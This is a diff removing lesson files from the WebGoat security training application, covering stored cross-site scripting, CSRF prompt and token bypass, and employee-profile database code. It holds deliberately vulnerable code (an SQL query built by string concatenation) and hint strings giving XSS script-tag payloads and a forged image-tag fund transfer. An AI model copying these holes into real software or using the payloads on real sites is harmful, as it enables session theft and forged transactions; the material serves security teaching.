-        // Fix this method using the org.owasp.webgoat.session.ParameterParser class
-        return null;
-    }
-
-    public String getNextPage(WebSession s)
-    {
-        return CrossSiteScripting.VIEWPROFILE_ACTION;
-    }
-
-    public void changeEmployeeProfile(WebSession s, int userId, int subjectId, Employee employee)
-            throws UnauthorizedException
-    {
-        try
-        {
-            // Note: The password field is ONLY set by ChangePassword
-            String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
-                    + " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
-                    + " personal_description = ? WHERE userid = ?;";
-            try
-            {
-                PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query,
-                                                                                    ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                                    ResultSet.CONCUR_READ_ONLY);
-
-                ps.setString(1, employee.getFirstName());
-                ps.setString(2, employee.getLastName());
-                ps.setString(3, employee.getSsn());
-                ps.setString(4, employee.getTitle());
-                ps.setString(5, employee.getPhoneNumber());
-                ps.setString(6, employee.getAddress1());
-                ps.setString(7, employee.getAddress2());
-                ps.setInt(8, employee.getManager());
-                ps.setString(9, employee.getStartDate());
-                ps.setString(10, employee.getCcn());
-                ps.setInt(11, employee.getCcnLimit());
-                ps.setString(12, employee.getPersonalDescription());
-                ps.setInt(13, subjectId);
-                ps.execute();
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error updating employee profile");
-                sqle.printStackTrace();
-            }
-
-        } catch (Exception e)
-        {
-            s.setMessage("Error updating employee profile");
-            e.printStackTrace();
-        }
-    }
-
-    public void doChangeEmployeeProfile_BACKUP(WebSession s, int userId, int subjectId, Employee employee)
-            throws UnauthorizedException
-    {
-        try
-        {
-            // Note: The password field is ONLY set by ChangePassword
-            String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
-                    + " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
-                    + " personal_description = ? WHERE userid = ?;";
-            try
-            {
-                PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query,
-                                                                                    ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                                    ResultSet.CONCUR_READ_ONLY);
-
-                ps.setString(1, employee.getFirstName());
-                ps.setString(2, employee.getLastName());
-                ps.setString(3, employee.getSsn());
-                ps.setString(4, employee.getTitle());
-                ps.setString(5, employee.getPhoneNumber());
-                ps.setString(6, employee.getAddress1());
-                ps.setString(7, employee.getAddress2());
-                ps.setInt(8, employee.getManager());
-                ps.setString(9, employee.getStartDate());
-                ps.setString(10, employee.getCcn());
-                ps.setInt(11, employee.getCcnLimit());
-                ps.setString(12, employee.getPersonalDescription());
-                ps.setInt(13, subjectId);
-                ps.executeUpdate(query);
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error updating employee profile");
-                sqle.printStackTrace();
-            }
-
-        } catch (Exception e)
-        {
-            s.setMessage("Error updating employee profile");
-            e.printStackTrace();
-        }
-    }
-
-    public void createEmployeeProfile(WebSession s, int userId, Employee employee) throws UnauthorizedException
-    {
-        try
-        {
-            // FIXME: Cannot choose the id because we cannot guarantee uniqueness
-            int nextId = getNextUID(s);
-            String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
-
-            // System.out.println("Query: " + query);
-
-            try
-            {
-                PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
-
-                ps.setString(1, employee.getFirstName().toLowerCase());
-                ps.setString(2, employee.getLastName());
-                ps.setString(3, employee.getSsn());
-                ps.setString(4, employee.getTitle());
-                ps.setString(5, employee.getPhoneNumber());
-                ps.setString(6, employee.getAddress1());
-                ps.setString(7, employee.getAddress2());
-                ps.setInt(8, employee.getManager());
-                ps.setString(9, employee.getStartDate());
-                ps.setString(10, employee.getCcn());
-                ps.setInt(11, employee.getCcnLimit());
-                ps.setString(12, employee.getDisciplinaryActionDate());
-                ps.setString(13, employee.getDisciplinaryActionNotes());
-                ps.setString(14, employee.getPersonalDescription());
-
-                ps.execute();
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error updating employee profile");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error updating employee profile");
-            e.printStackTrace();
-        }
-    }
-
-    public void createEmployeeProfile_BACKUP(WebSession s, int userId, Employee employee) throws UnauthorizedException
-    {
-        try
-        {
-            // FIXME: Cannot choose the id because we cannot guarantee uniqueness
-            int nextId = getNextUID(s);
-            String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
-
-            // System.out.println("Query: " + query);
-
-            try
-            {
-                PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
-
-                ps.setString(1, employee.getFirstName().toLowerCase());
-                ps.setString(2, employee.getLastName());
-                ps.setString(3, employee.getSsn());
-                ps.setString(4, employee.getTitle());
-                ps.setString(5, employee.getPhoneNumber());
-                ps.setString(6, employee.getAddress1());
-                ps.setString(7, employee.getAddress2());
-                ps.setInt(8, employee.getManager());
-                ps.setString(9, employee.getStartDate());
-                ps.setString(10, employee.getCcn());
-                ps.setInt(11, employee.getCcnLimit());
-                ps.setString(12, employee.getDisciplinaryActionDate());
-                ps.setString(13, employee.getDisciplinaryActionNotes());
-                ps.setString(14, employee.getPersonalDescription());
-
-                ps.execute();
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error updating employee profile");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error updating employee profile");
-            e.printStackTrace();
-        }
-    }
-
-    /**
-     * Validates that the given parameter value matches the given regular expression pattern.
-     * 
-     * @param parameter
-     * @param pattern
-     * @return
-     * @throws ValidationException
-     */
-    protected String validate(final String parameter, final Pattern pattern) throws ValidationException
-    {
-        Matcher matcher = pattern.matcher(parameter);
-        if (!matcher.matches()) throw new ValidationException();
-
-        return parameter;
-    }
-
-    private int getNextUID(WebSession s)
-    {
-        int uid = -1;
-        try
-        {
-            Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                                ResultSet.CONCUR_READ_ONLY);
-            ResultSet results = statement.executeQuery("select max(userid) as uid from employee");
-            results.first();
-            uid = results.getInt("uid");
-        } catch (SQLException sqle)
-        {
-            sqle.printStackTrace();
-            s.setMessage("Error updating employee profile");
-        }
-        return uid + 1;
-    }
-}

src/main/java/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java

@@ -1,213 +0,0 @@
-
-package org.owasp.webgoat.lessons.CrossSiteScripting;
-
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
-import org.owasp.webgoat.session.Employee;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- */
-public class ViewProfile extends DefaultLessonAction
-{
-
-    public ViewProfile(GoatHillsFinancial lesson, String lessonName, String actionName)
-    {
-        super(lesson, lessonName, actionName);
-    }
-
-    public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException,
-            UnauthorizedException, ValidationException
-    {
-        getLesson().setCurrentAction(s, getActionName());
-
-        if (isAuthenticated(s))
-        {
-            int userId = getIntSessionAttribute(s, getLessonName() + "." + CrossSiteScripting.USER_ID);
-            int employeeId = -1;
-            try
-            {
-                // User selected employee
-                employeeId = s.getParser().getIntParameter(CrossSiteScripting.EMPLOYEE_ID);
-            } catch (ParameterNotFoundException e)
-            {
-                // May be an internally selected employee
-                employeeId = getIntRequestAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ID);
-            }
-
-            Employee employee = getEmployeeProfile(s, userId, employeeId);
-            setSessionAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY, employee);
-
-            updateLessonStatus(s, employee);
-        }
-        else
-            throw new UnauthenticatedException();
-    }
-
-    public String getNextPage(WebSession s)
-    {
-        return CrossSiteScripting.VIEWPROFILE_ACTION;
-    }
-
-    public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
-    {
-        Employee profile = null;
-
-        // Query the database for the profile data of the given employee
-        try
-        {
-            String query = "SELECT * FROM employee WHERE userid = " + subjectUserId;
-            try
-            {
-                Statement answer_statement = WebSession.getConnection(s)
-                        .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-                ResultSet answer_results = answer_statement.executeQuery(query);
-                if (answer_results.next())
-                {
-
-                    // Note: Do NOT get the password field.
-                    profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
-                            answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
-                                    .getString("title"), answer_results.getString("phone"), answer_results
-                                    .getString("address1"), answer_results.getString("address2"), answer_results
-                                    .getInt("manager"), answer_results.getString("start_date"), answer_results
-                                    .getInt("salary"), answer_results.getString("ccn"), answer_results
-                                    .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
-                                    .getString("disciplined_notes"), answer_results.getString("personal_description"));
-                    /*
-                     * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-                     * " " + profile.getLastName() + " (" + profile.getId() + ")");
-                     */}
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error getting employee profile");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error getting employee profile");
-            e.printStackTrace();
-        }
-
-        return profile;
-    }
-
-    public Employee getEmployeeProfile_BACKUP(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
-    {
-        // Query the database to determine if this employee has access to this function
-        // Query the database for the profile data of the given employee if "owned" by the given
-        // user
-
-        Employee profile = null;
-
-        // Query the database for the profile data of the given employee
-        try
-        {
-            String query = "SELECT * FROM employee WHERE userid = " + subjectUserId;
-
-            try
-            {
-                Statement answer_statement = WebSession.getConnection(s)
-                        .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-                ResultSet answer_results = answer_statement.executeQuery(query);
-                if (answer_results.next())
-                {
-                    // Note: Do NOT get the password field.
-                    profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
-                            answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
-                                    .getString("title"), answer_results.getString("phone"), answer_results
-                                    .getString("address1"), answer_results.getString("address2"), answer_results
-                                    .getInt("manager"), answer_results.getString("start_date"), answer_results
-                                    .getInt("salary"), answer_results.getString("ccn"), answer_results
-                                    .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
-                                    .getString("disciplined_notes"), answer_results.getString("personal_description"));
-
-                    /*
-                     * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-                     * " " + profile.getLastName() + " (" + profile.getId() + ")");
-                     */}
-            } catch (SQLException sqle)
-            {
-                s.setMessage("Error getting employee profile");
-                sqle.printStackTrace();
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error getting employee profile");
-            e.printStackTrace();
-        }
-
-        return profile;
-    }
-
-    private void updateLessonStatus(WebSession s, Employee employee)
-    {
-        String stage = getStage(s);
-        int userId = -1;
-        try
-        {
-            userId = getIntSessionAttribute(s, getLessonName() + "." + CrossSiteScripting.USER_ID);
-        } catch (ParameterNotFoundException pnfe)
-        {
-        }
-        if (CrossSiteScripting.STAGE1.equals(stage))
-        {
-            String address1 = employee.getAddress1().toLowerCase();
-            if (userId != employee.getId() && address1.indexOf("<script>") > -1 && address1.indexOf("alert") > -1
-                    && address1.indexOf("</script>") > -1)
-            {
-                setStageComplete(s, CrossSiteScripting.STAGE1);
-            }
-        }
-        else if (CrossSiteScripting.STAGE3.equals(stage))
-        {
-            String address2 = employee.getAddress1().toLowerCase();
-            if (address2.indexOf("<script>") > -1 && address2.indexOf("alert") > -1
-                    && address2.indexOf("</script>") > -1)
-            {
-                setStageComplete(s, CrossSiteScripting.STAGE3);
-            }
-        }
-        else if (CrossSiteScripting.STAGE4.equals(stage))
-        {
-            if (employee.getAddress1().toLowerCase().indexOf("&lt;") > -1)
-            {
-                setStageComplete(s, CrossSiteScripting.STAGE4);
-            }
-        }
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/CsrfPromptByPass.java

@@ -1,185 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-
-import javax.servlet.http.HttpSession;
-
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.B;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Form;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.Input;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.util.HtmlEncoder;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Contributed by <a href="http://www.partnet.com">PartNet.</a>
- * 
- */
-public class CsrfPromptByPass extends CSRF
-{
-    protected static final String TRANSFER_FUND_AMOUNT_ATTRIBUTE = "transferFundAmount";
-    protected static final String CANCEL_TRANSFER = "CANCEL";
-    protected static final String CONFIRM_TRANFER = "CONFIRM";
-    
-    /**
-     * if TRANSFER_FUND_PARAMETER is a parameter, them doTransfer is invoked.  doTranser presents the 
-     * web content to confirm and then execute a simulated transfer of funds.  An initial request
-     * should have a dollar amount specified.  The amount will be stored and a confirmation form is presented.  
-     * The confirmation can be canceled or confirmed.  Confirming the transfer will mark this lesson as completed.
-     * 
-     * @param s
-     * @return Element will appropriate web content for a transfer of funds.
-     */
-    protected Element doTransfer(WebSession s) {
-        String transferFunds = HtmlEncoder.encode(s.getParser().getRawParameter(TRANSFER_FUNDS_PARAMETER, ""));
-        ElementContainer ec = new ElementContainer();
-        
-        if (transferFunds.length() != 0) {
-            
-            HttpSession httpSession = s.getRequest().getSession();
-            Integer transferAmount = (Integer) httpSession.getAttribute(TRANSFER_FUND_AMOUNT_ATTRIBUTE);
-            
-            if (transferFunds.equalsIgnoreCase(TRANSFER_FUNDS_PAGE)){
-                
-                //present transfer form
-                ec.addElement(new H1("Electronic Transfer:"));
-                String action = getLink();
-                Form form = new Form(action, Form.POST);
-                form.addElement( new Input(Input.text, TRANSFER_FUNDS_PARAMETER, "0"));
-                //if this token is present we won't mark the lesson as completed
-                form.addElement( new Input(Input.submit));
-                ec.addElement(form);
-                
-            } else if (transferFunds.equalsIgnoreCase(CONFIRM_TRANFER) && transferAmount != null ){
-                
-                //transfer is confirmed
-                ec.addElement(new H1("Electronic Transfer Complete"));
-                ec.addElement(new StringElement("Amount Transfered: "+transferAmount));
-                makeSuccess(s);
-                
-            } else if (transferFunds.equalsIgnoreCase(CANCEL_TRANSFER)){
-                
-                //clear any pending fund transfer
-                s.getRequest().removeAttribute(TRANSFER_FUND_AMOUNT_ATTRIBUTE);
-                
-            } else if (transferFunds.length() > 0){
-                
-                //save the transfer amount in the session
-                transferAmount = new Integer(transferFunds);
-                httpSession.setAttribute(TRANSFER_FUND_AMOUNT_ATTRIBUTE, transferAmount);
-                
-                //prompt for confirmation
-                
-                ec.addElement(new H1("Electronic Transfer Confirmation:"));
-                ec.addElement(new StringElement("Amount to transfer: "+transferAmount));
-                ec.addElement(new BR());
-                String action = getLink();
-                Form form = new Form(action, Form.POST);
-                form.addElement( new Input(Input.submit, TRANSFER_FUNDS_PARAMETER, CONFIRM_TRANFER));
-                form.addElement( new Input(Input.submit, TRANSFER_FUNDS_PARAMETER, CANCEL_TRANSFER));
-                ec.addElement(form);    
-            }
-        }
-        // white space
-        ec.addElement(new BR());
-        ec.addElement(new BR());
-        ec.addElement(new BR());
-        return ec;
-    }
-
-    /**
-     * @param s current web session
-     * @return true if the page should be rendered as a Transfer of funds page or false for the normal message posting page.
-     */
-    protected boolean isTransferFunds(WebSession s) {
-        String transferFunds = s.getParser().getRawParameter(TRANSFER_FUNDS_PARAMETER, "");
-        if (transferFunds.length() != 0){
-            return true;
-        }
-        return false;
-    }
-
-    @Override
-    protected Category getDefaultCategory()
-    {
-        return Category.XSS;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(122);
-
-    @Override
-    protected Integer getDefaultRanking()
-    {
-
-        return DEFAULT_RANKING;
-    }
-
-    @Override
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add("Add 'transferFunds=400' to the URL and inspect the form that is returned");
-        hints.add("Add java script to send the confirmation after requesting the transfer");
-        hints.add("Insert two images or iframes, the second with no source.  Specify the onload attribute of the first to set the source of the second. ");
-        hints.add("Include this URL in the message <pre>&lt;img src='" + getLink()
-                + "&transferFunds=5000' width=\"1\" height=\"1\" /&gt;</pre>");
-
-        return hints;
-    }
-
-    /**
-     * Gets the title attribute of the MessageBoardScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("CSRF Prompt By-Pass");
-    }
-
-    public Element getCredits()
-    {
-        A partnet = new A("http://www.partnet.com");
-        partnet.setPrettyPrint(false);
-        partnet.addElement(new StringElement("PART"));
-        partnet.addElement(new B().addElement(new StringElement("NET")).setPrettyPrint(false));
-        partnet.setStyle("background-color:midnightblue;color:white");
-        
-        ElementContainer credits = new ElementContainer();
-        credits.addElement(new StringElement("Contributed by "));
-        credits.addElement(partnet);
-        return credits;
-    }
-}

src/main/java/org/owasp/webgoat/lessons/CsrfTokenByPass.java

@@ -1,165 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.security.SecureRandom;
-import java.util.ArrayList;
-import java.util.List;
-import java.util.Random;
-
-import javax.servlet.http.HttpSession;
-
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.B;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Form;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.Input;
-import org.owasp.webgoat.session.WebSession;
-import org.owasp.webgoat.util.HtmlEncoder;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Contributed by <a href="http://www.partnet.com">PartNet.</a>
- * 
- */
-public class CsrfTokenByPass extends CsrfPromptByPass
-{
-    protected static final String TRANSFER_FUNDS_PARAMETER = "transferFunds";
-    private static final String CSRFTOKEN = "CSRFToken";
-    private static final int INVALID_TOKEN = 0;
-    private final Random random;
-    
-    public CsrfTokenByPass(){
-        super();
-        random = new SecureRandom();
-    }
-    /**
-     * if TRANSFER_FUND_PARAMETER is a parameter, them doTransfer is invoked.  doTranser presents the 
-     * web content to confirm and then execute a simulated transfer of funds.  An initial request
-     * should have a dollar amount specified.  The amount will be stored and a confirmation form is presented.  
-     * The confirmation can be canceled or confirmed.  Confirming the transfer will mark this lesson as completed.
-     * 
-     * @param s
-     * @return Element will appropriate web content for a transfer of funds.
-     */
-    protected Element doTransfer(WebSession s) {
-        String transferFunds = HtmlEncoder.encode(s.getParser().getRawParameter(TRANSFER_FUNDS_PARAMETER, ""));
-        String passedInTokenString = HtmlEncoder.encode(s.getParser().getRawParameter(CSRFTOKEN, ""));
-        ElementContainer ec = new ElementContainer();
-        
-        if (transferFunds.length() != 0)
-        {   
-            HttpSession httpSession = s.getRequest().getSession();
-            
-            //get tokens to validate
-            Integer sessionToken = (Integer) httpSession.getAttribute(CSRFTOKEN);
-            Integer passedInToken = s.getParser().getIntParameter(CSRFTOKEN, INVALID_TOKEN);
-            
-            if (transferFunds.equalsIgnoreCase(TRANSFER_FUNDS_PAGE)){
-                
-                //generate new random token:
-                int token = INVALID_TOKEN;
-                while (token == INVALID_TOKEN){
-                    token = random.nextInt();
-                }
-                httpSession.setAttribute(CSRFTOKEN, token);
-                
-                //present transfer form
-                ec.addElement(new H1("Electronic Transfer:"));
-                String action = getLink();
-                Form form = new Form(action, Form.POST);
-                form.addAttribute("id", "transferForm");
-                form.addElement( new Input(Input.text, TRANSFER_FUNDS_PARAMETER, "0"));
-                form.addElement( new Input(Input.hidden, CSRFTOKEN, token));
-                form.addElement( new Input(Input.submit));
-                ec.addElement(form);
-                //present transfer funds form
-                
-            } else if (transferFunds.length() > 0 && sessionToken != null && sessionToken.equals(passedInToken)){
-                
-                //transfer is confirmed
-                ec.addElement(new H1("Electronic Transfer Complete"));
-                ec.addElement(new StringElement("Amount Transfered: "+transferFunds));
-                makeSuccess(s);
-                
-            } 
-            //white space
-            ec.addElement(new BR());
-            ec.addElement(new BR());
-            ec.addElement(new BR());
-        }
-        return ec;
-    }
-    
-    
-    private final static Integer DEFAULT_RANKING = new Integer(123);
-    
-    @Override
-    protected Integer getDefaultRanking()
-    {
-
-        return DEFAULT_RANKING;
-    }
-
-    @Override
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add("Add 'transferFunds=main' to the URL and inspect the form that is returned");
-        hints.add("The forged request needs both a token and the transfer funds parameter");
-        hints.add("Find the token in the page with transferFunds=main. Can you script a way to get the token?");
-        
-        return hints;
-    }
-
-    /**
-     * Gets the title attribute of the MessageBoardScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("CSRF Token By-Pass");
-    }
-
-    public Element getCredits()
-    {
-        A partnet = new A("http://www.partnet.com");
-        partnet.setPrettyPrint(false);
-        partnet.addElement(new StringElement("PART"));
-        partnet.addElement(new B().addElement(new StringElement("NET")).setPrettyPrint(false));
-        partnet.setStyle("background-color:midnightblue;color:white");
-        
-        ElementContainer credits = new ElementContainer();
-        credits.addElement(new StringElement("Contributed by "));
-        credits.addElement(partnet);
-        return credits;
-    }
-}

src/main/java/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java

@@ -1,243 +0,0 @@
-
-package org.owasp.webgoat.lessons.DBCrossSiteScripting;
-
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.ElementContainer;
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.DeleteProfile;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.EditProfile;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.FindProfile;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.ListStaff;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.Login;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.Logout;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.SearchStaff;
-import org.owasp.webgoat.lessons.GoatHillsFinancial.ViewProfile;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.UnauthenticatedException;
-import org.owasp.webgoat.session.UnauthorizedException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/**
- * /*******************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- */
-public class DBCrossSiteScripting extends GoatHillsFinancial
-{
-    private final static Integer DEFAULT_RANKING = new Integer(100);
-
-    public final static String STAGE1 = "Stored XSS";
-
-    public final static String STAGE2 = "Block Stored XSS using DB Input Validation";
-
-    protected void registerActions(String className)
-    {
-        registerAction(new ListStaff(this, className, LISTSTAFF_ACTION));
-        registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION));
-        registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION));
-        registerAction(new EditProfile(this, className, EDITPROFILE_ACTION));
-        registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION));
-
-        // These actions are special in that they chain to other actions.
-        registerAction(new Login(this, className, LOGIN_ACTION, getAction(LISTSTAFF_ACTION)));
-        registerAction(new Logout(this, className, LOGOUT_ACTION, getAction(LOGIN_ACTION)));
-        registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
-        registerAction(new UpdateProfile(this, className, UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION)));
-        registerAction(new DeleteProfile(this, className, DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION)));
-    }
-
-    /**
-     * Gets the category attribute of the CrossSiteScripting object
-     * 
-     * @return The category value
-     */
-    public Category getDefaultCategory()
-    {
-        return Category.XSS;
-    }
-
-    /**
-     * Gets the hints attribute of the DirectoryScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-
-        // Stage 1
-        hints.add("You can put HTML tags in form input fields.");
-        hints.add("Bury a SCRIPT tag in the field to attack anyone who reads it.");
-        hints
-                .add("Enter this: &lt;script language=\"javascript\" type=\"text/javascript\"&gt;alert(\"Ha Ha Ha\");&lt;/script&gt; in message fields.");
-        hints.add("Enter this: &lt;script&gtalert(\"document.cookie\");&lt;/script&gt; in message fields.");
-
-        // Stage 2
-        hints.add("Many scripts rely on the use of special characters such as: &lt;");
-        hints
-                .add("Allowing only a certain set of characters (positive filtering) is preferred to blocking a set of characters (negative filtering).");
-        hints.add("Oracle 10 supports a regular expression matching function : REGEXP_LIKE(text, pattern).");
-
-        return hints;
-    }
-
-    /**
-     * Gets the instructions attribute of the ParameterInjection object
-     * 
-     * @return The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-        String instructions = "";
-
-        if (!getLessonTracker(s).getCompleted())
-        {
-            String stage = getStage(s);
-            if (STAGE1.equals(stage))
-            {
-                instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.<br><br>"
-                        + "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
-                        + "As 'Tom', execute a Stored XSS attack against the Street field on the Edit Profile page.  "
-                        + "Verify that 'Jerry' is affected by the attack. "
-                        + "A sample JavaScript snippet you can use is: &lt;SCRIPT&gt;alert('bang!');&lt;/SCRIPT&gt;.";
-            }
-            else if (STAGE2.equals(stage))
-            {
-                instructions = "Stage 2: Block Stored XSS using Input Validation.<br>"
-                        + "Implement a fix in the stored procedure to prevent the stored XSS from being written to the database. ";
-                if (getWebgoatContext().getDatabaseDriver().contains("jtds"))
